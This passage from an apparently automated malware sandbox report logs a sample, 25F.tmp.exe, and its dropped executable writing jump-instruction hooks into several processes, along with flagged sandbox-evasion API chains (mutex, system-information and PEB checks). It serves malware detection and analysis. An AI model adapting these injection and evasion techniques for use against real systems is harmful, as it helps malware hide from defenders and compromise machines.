            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1060 base: 769A6C19 value: E9 32 06 7B 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1060 base: 769A4889 value: E9 82 D4 7A 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1060 base: 76A91D20 value: E9 7B 03 6C 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1060 base: 76A0BF10 value: E9 4B 62 74 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1060 base: 76A81610 value: E9 8B 0D 6D 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1060 base: 774D0078 value: E9 53 53 C8 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1060 base: 774EEB2A value: E9 D1 67 C6 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2248 base: 774CFA50 value: E9 3B 69 32 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2248 base: 774CFDA8 value: E9 93 68 32 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2248 base: 757158CD value: E9 2E B7 0D 8B
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2248 base: 757182ED value: E9 AE 8D 0D 8B
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2248 base: 7576DF21 value: E9 EA 45 08 8B
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2248 base: 75709AE0 value: E9 8B 8A 0E 8B
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2248 base: 756F5366 value: E9 55 BE 0F 8B
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2248 base: 756F3EFC value: E9 8F D3 0F 8B
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2248 base: 69CBA9B0 value: E9 3B 6D B3 96
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2248 base: 69CA572C value: E9 AF C0 B4 96
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2248 base: 769A6C19 value: E9 32 06 E5 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2248 base: 769A4889 value: E9 82 D4 E4 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2248 base: 76A91D20 value: E9 7B 03 D6 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2248 base: 76A0BF10 value: E9 4B 62 DE 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2248 base: 76A81610 value: E9 8B 0D D7 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2248 base: 774D0078 value: E9 53 53 32 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2248 base: 774EEB2A value: E9 D1 67 30 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1448 base: 774CFA50 value: E9 3B 69 D8 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1448 base: 774CFDA8 value: E9 93 68 D8 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1448 base: 757158CD value: E9 2E B7 B3 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1448 base: 757182ED value: E9 AE 8D B3 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1448 base: 7576DF21 value: E9 EA 45 AE 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1448 base: 75709AE0 value: E9 8B 8A B4 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1448 base: 756F5366 value: E9 55 BE B5 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1448 base: 756F3EFC value: E9 8F D3 B5 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1448 base: 69CBA9B0 value: E9 3B 6D 59 96
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1448 base: 69CA572C value: E9 AF C0 5A 96
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1448 base: 769A6C19 value: E9 32 06 8B 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1448 base: 769A4889 value: E9 82 D4 8A 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1448 base: 76A91D20 value: E9 7B 03 7C 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1448 base: 76A0BF10 value: E9 4B 62 84 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1448 base: 76A81610 value: E9 8B 0D 7D 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1448 base: 774D0078 value: E9 53 53 D8 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1448 base: 774EEB2A value: E9 D1 67 D6 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2228 base: 774CFA50 value: E9 3B 69 D9 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2228 base: 774CFDA8 value: E9 93 68 D9 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2228 base: 757158CD value: E9 2E B7 B4 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2228 base: 757182ED value: E9 AE 8D B4 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2228 base: 7576DF21 value: E9 EA 45 AF 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2228 base: 75709AE0 value: E9 8B 8A B5 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2228 base: 756F5366 value: E9 55 BE B6 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2228 base: 756F3EFC value: E9 8F D3 B6 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2228 base: 69CBA9B0 value: E9 3B 6D 5A 96
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2228 base: 69CA572C value: E9 AF C0 5B 96
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2228 base: 769A6C19 value: E9 32 06 8C 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2228 base: 769A4889 value: E9 82 D4 8B 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2228 base: 76A91D20 value: E9 7B 03 7D 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2228 base: 76A0BF10 value: E9 4B 62 85 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2228 base: 76A81610 value: E9 8B 0D 7E 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2228 base: 774D0078 value: E9 53 53 D9 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2228 base: 774EEB2A value: E9 D1 67 D7 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1260 base: 774CFA50 value: E9 3B 69 F2 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1260 base: 774CFDA8 value: E9 93 68 F2 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1260 base: 757158CD value: E9 2E B7 CD 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1260 base: 757182ED value: E9 AE 8D CD 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1260 base: 7576DF21 value: E9 EA 45 C8 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1260 base: 75709AE0 value: E9 8B 8A CE 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1260 base: 756F5366 value: E9 55 BE CF 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1260 base: 756F3EFC value: E9 8F D3 CF 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1260 base: 69CBA9B0 value: E9 3B 6D 73 96
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1260 base: 69CA572C value: E9 AF C0 74 96
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1260 base: 769A6C19 value: E9 32 06 A5 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1260 base: 769A4889 value: E9 82 D4 A4 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1260 base: 76A91D20 value: E9 7B 03 96 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1260 base: 76A0BF10 value: E9 4B 62 9E 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1260 base: 76A81610 value: E9 8B 0D 97 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1260 base: 774D0078 value: E9 53 53 F2 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1260 base: 774EEB2A value: E9 D1 67 F0 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1852 base: 774CFA50 value: E9 3B 69 F2 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1852 base: 774CFDA8 value: E9 93 68 F2 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1852 base: 757158CD value: E9 2E B7 CD 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1852 base: 757182ED value: E9 AE 8D CD 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1852 base: 7576DF21 value: E9 EA 45 C8 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1852 base: 75709AE0 value: E9 8B 8A CE 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1852 base: 756F5366 value: E9 55 BE CF 8A
            Source: C:\Users\user\Desktop\25F.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Found evasive API chain (may stop execution after checking mutex)
            Source: C:\Users\user\Desktop\25F.tmp.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_4-10911
            Found evasive API chain (may stop execution after checking system information)
            Source: C:\Users\user\Desktop\25F.tmp.exeEvasive API call chain: NtQuerySystemInformation,DecisionNodes,ExitProcessgraph_4-10572
            Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
            Source: C:\Users\user\Desktop\25F.tmp.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_4-10462
            Source: C:\Users\user\Desktop\25F.tmp.exeAPI coverage: 3.6 %
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeAPI coverage: 1.6 %
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeAPI coverage: 1.6 %
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeAPI coverage: 1.6 %
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeAPI coverage: 1.6 %
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeAPI coverage: 1.6 %
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeAPI coverage: 1.6 %
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeAPI coverage: 1.6 %
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeAPI coverage: 1.6 %
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeAPI coverage: 1.6 %
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeAPI coverage: 1.6 %
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeAPI coverage: 1.6 %
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeAPI coverage: 1.6 %
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeAPI coverage: 1.6 %
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeAPI coverage: 1.6 %
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeAPI coverage: 1.6 %
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeAPI coverage: 1.6 %
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeAPI coverage: 1.6 %
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeAPI coverage: 1.6 %
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeAPI coverage: 1.6 %
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeAPI coverage: 1.6 %
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeAPI coverage: 1.6 %
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeAPI coverage: 1.6 %
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeAPI coverage: 1.6 %
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeAPI coverage: 1.6 %
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeAPI coverage: 1.6 %
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeAPI coverage: 1.6 %
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeAPI coverage: 1.6 %
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeAPI coverage: 1.6 %
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeAPI coverage: 1.6 %
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeAPI coverage: 1.6 %
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeAPI coverage: 1.6 %
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeAPI coverage: 1.6 %
            Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe TID: 680Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 0_2_006045E0 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,0_2_006045E0
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 2_2_006045E0 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,2_2_006045E0
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 4_2_0036F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,4_2_0036F130
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 4_2_0040F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,4_2_0040F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 9_2_003DF130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,9_2_003DF130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 10_2_0018F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,10_2_0018F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 11_2_0038F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,11_2_0038F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 12_2_0041F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,12_2_0041F130
